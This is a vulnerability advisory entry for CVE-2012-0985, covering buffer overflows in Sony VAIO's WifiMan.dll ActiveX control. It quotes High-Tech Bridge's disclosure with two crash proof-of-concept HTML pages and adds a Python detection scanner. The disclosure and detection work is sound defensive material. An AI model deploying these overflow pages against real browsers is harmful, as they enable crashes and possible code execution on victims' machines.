Sony VAIO Wireless Manager ActiveX Control Buffer Overflow Vulnerability

Vulnerability ID: 1121172; Vulnerability type: Buffer overflow
Published: 2012-05-31; Updated: 2012-05-31
CVE ID: CVE-2012-0985; CNNVD-ID: CNNVD-201205-543
Platform: Windows; CVSS score: 9.3
|Vulnerability Sources
https://www.exploit-db.com/exploits/18958
https://www.securityfocus.com/bid/53735
https://cxsecurity.com/issue/WLB-2012050232
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201205-543
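|Vulnerability Details
Sony VAIO is a line of computer systems made by Sony. The Sony VAIO Wireless Manager ActiveX control (WifiMan.dll) contains multiple buffer overflow vulnerabilities, caused by the application's insufficient bounds checking of user-supplied input. An attacker can exploit these vulnerabilities to execute arbitrary code in the context of the application that uses the ActiveX control (typically IE); a failed attack results in a denial of service. Sony VAIO Wireless Manager version 4.0.0.0 is vulnerable, and other versions may also be affected.
|Exploit (EXP)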
Advisory ID: HTB23063
Product: Wireless Manager Sony VAIO
Vendor: Sony Computers
Vulnerable Version(s): 4.0.0.0 and probably prior
Tested Version: 4.0.0.0
Vendor Notification: 7 December 2011 
Vendor Patch: 20 January 2012 
Public Disclosure: 30 May 2012 
Vulnerability Type: Buffer Overflow
CVE Reference: CVE-2012-0985
Solution Status: Fixed by Vendor
Risk Level: High 
Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge SA Security Research Lab has discovered 2 buffer overflow vulnerabilities in Wireless Manager Sony VAIO which can be exploited to execute arbitrary code on a vulnerable system.


1) Buffer Overflow in Wireless Manager Sony VAIO: CVE-2012-0985


1.1 The method SetTmpProfileOption() in WifiMan.dll library does not properly check the length of string parameters.

An attacker could craft a malicious HTML page to trigger the vulnerability and execute arbitrary code in the context of the affected user.

The following PoC will crash the application:


<HTML>
<BODY>
<object id=ctrl 
classid="clsid:{92E7DDED-BBFE-4DDF-B717-074E3B602D1B}"></object>
<SCRIPT>
function Do_()
{
   arg1=1
   arg2=String(8212, "X")
   arg3="defaultV"
   SetTmpProfileOption arg1 ,arg2 ,arg3
}
</SCRIPT>
<input language=JavaScript onclick=Do_() type=button value="Sony_POC">
</BODY>
</HTML>



1.2 The method ConnectToNetwork() in WifiMan.dll library does not properly check the length of string parameters.

An attacker could craft a malicious HTML page to trigger the vulnerability and execute arbitrary code in the context of the affected user.

The following PoC will crash the application:


<HTML>
<BODY>
<object id=ctrl 
classid="clsid:{92E7DDED-BBFE-4DDF-B717-074E3B602D1B}"></object>
<SCRIPT>
function Do_()
{
   arg1=1
   arg2=String(6164, "X")
   target.ConnectToNetwork arg1 ,arg2
}
</SCRIPT>
<input language=JavaScript onclick=Do_() type=button value="Sony_POC">
</BODY>
</HTML>
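
A defender-side triage check for the pattern both PoCs share, added here as an example (it is not part of the High-Tech Bridge advisory or any Sony code): it flags web content that instantiates the control's CLSID and calls either affected method with a very long string. The CLSID and method names come from the advisory; the 1024-character threshold, the `scan_page` name and the sample pages are assumptions constructed for illustration.

```python
import re

# CLSID and method names are taken from the advisory above.
CLSID = "92E7DDED-BBFE-4DDF-B717-074E3B602D1B"
METHODS = ("SetTmpProfileOption", "ConnectToNetwork")
MAX_ARG_LEN = 1024  # assumption: longest string argument treated as normal

CLSID_RE = re.compile(r"clsid:\s*\{?" + re.escape(CLSID) + r"\}?", re.I)
METHOD_RE = re.compile(r"\b(" + "|".join(METHODS) + r")\b", re.I)
BUILDER_RE = re.compile(r"\bString\s*\(\s*(\d+)\s*,", re.I)  # VBScript String(n, ch)
LITERAL_RE = re.compile(r'"([^"\r\n]*)"')                    # double-quoted literal
CANONICAL = {m.lower(): m for m in METHODS}


def scan_page(html, max_arg_len=MAX_ARG_LEN):
    """Return a finding dict for pages that load the control, else None."""
    if not CLSID_RE.search(html):
        return None  # a method name without the control is not a finding
    methods = sorted({CANONICAL[m.lower()] for m in METHOD_RE.findall(html)})
    # Longest string the script can build: String(n, ...) counts or literal lengths.
    sizes = [int(n) for n in BUILDER_RE.findall(html)]
    sizes += [len(s) for s in LITERAL_RE.findall(html)]
    longest = max(sizes, default=0)
    # The control being scripted from web content at all deserves review;
    # an affected method combined with an oversized string is the overflow pattern.
    verdict = "block" if methods and longest > max_arg_len else "review"
    return {"methods": methods, "longest_arg": longest, "verdict": verdict}


# Constructed sample pages (not captured traffic).
BENIGN = '<p>ConnectToNetwork is described in the user guide.</p>'
LOAD_ONLY = '<object classid="clsid:{92E7DDED-BBFE-4DDF-B717-074E3B602D1B}"></object>'
OVERSIZED = (
    '<object id=ctrl classid="CLSID:92e7dded-bbfe-4ddf-b717-074e3b602d1b"></object>\n'
    '<script language=VBScript>\ns = String(5000, "A")\n'
    'ctrl.ConnectToNetwork 1, s\n</script>'
)

if __name__ == "__main__":
    for name, page in (("benign", BENIGN), ("load_only", LOAD_ONLY), ("oversized", OVERSIZED)):
        print(name, scan_page(page))
```

Pattern matching of this kind is a triage heuristic: script that assembles the method name or the string at run time will not match, so it sits alongside the vendor update rather than replacing it.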


-----------------------------------------------------------------------------------------------

Solution:

Sony has released a security update for the Affected Models that resolves this issue. Sony recommends that all customers who have Affected Models immediately install the latest version of the software by using VAIO Update.

Note: If you are using the default VAIO Update settings the update will be installed automatically.

More information and security update:
http://esupport.sony.com/US/perl/support-info.pl?template_id=1&info_id=946

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23063 - https://www.htbridge.com/advisory/HTB23063 - Buffer Overflow in Wireless Manager Sony VAIO.
[2] Wireless Manager Sony VAIO - http://www.sony.co.uk/hub/vaio-laptops - is software for managing wireless connections that is installed by default on various series of Sony VAIO laptops.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
|Affected Products
Sony VAIO Wireless Manager 4.0.0.0
|References

Source: XF
Name: vaio-activex-bo(75978)
Link: http://xforce.iss.net/xforce/xfdb/75978
Source: BID
Name: 53735
Link: http://www.securityfocus.com/bid/53735
Source: EXPLOIT-DB
Name: 18958
Link: http://www.exploit-db.com/exploits/18958
Source: SECUNIA
Name: 49340
Link: http://secunia.com/advisories/49340
Source: OSVDB
Name: 82401
Link: http://osvdb.org/82401
Source: esupport.sony.com
Link: http://esupport.sony.com/US/perl/support-info.pl?template_id=1&info_id=946
Source: BUGTRAQ
Name: 20120530 2 Buffer Overflows in Wireless Manager Sony VAIO
Link: http://archives.neohapsis.com/archives/bugtraq/2012-05/0147.html
Source: NSFOCUS
Name: 19725
Link: http://www.nsfocus.net/vulndb/19725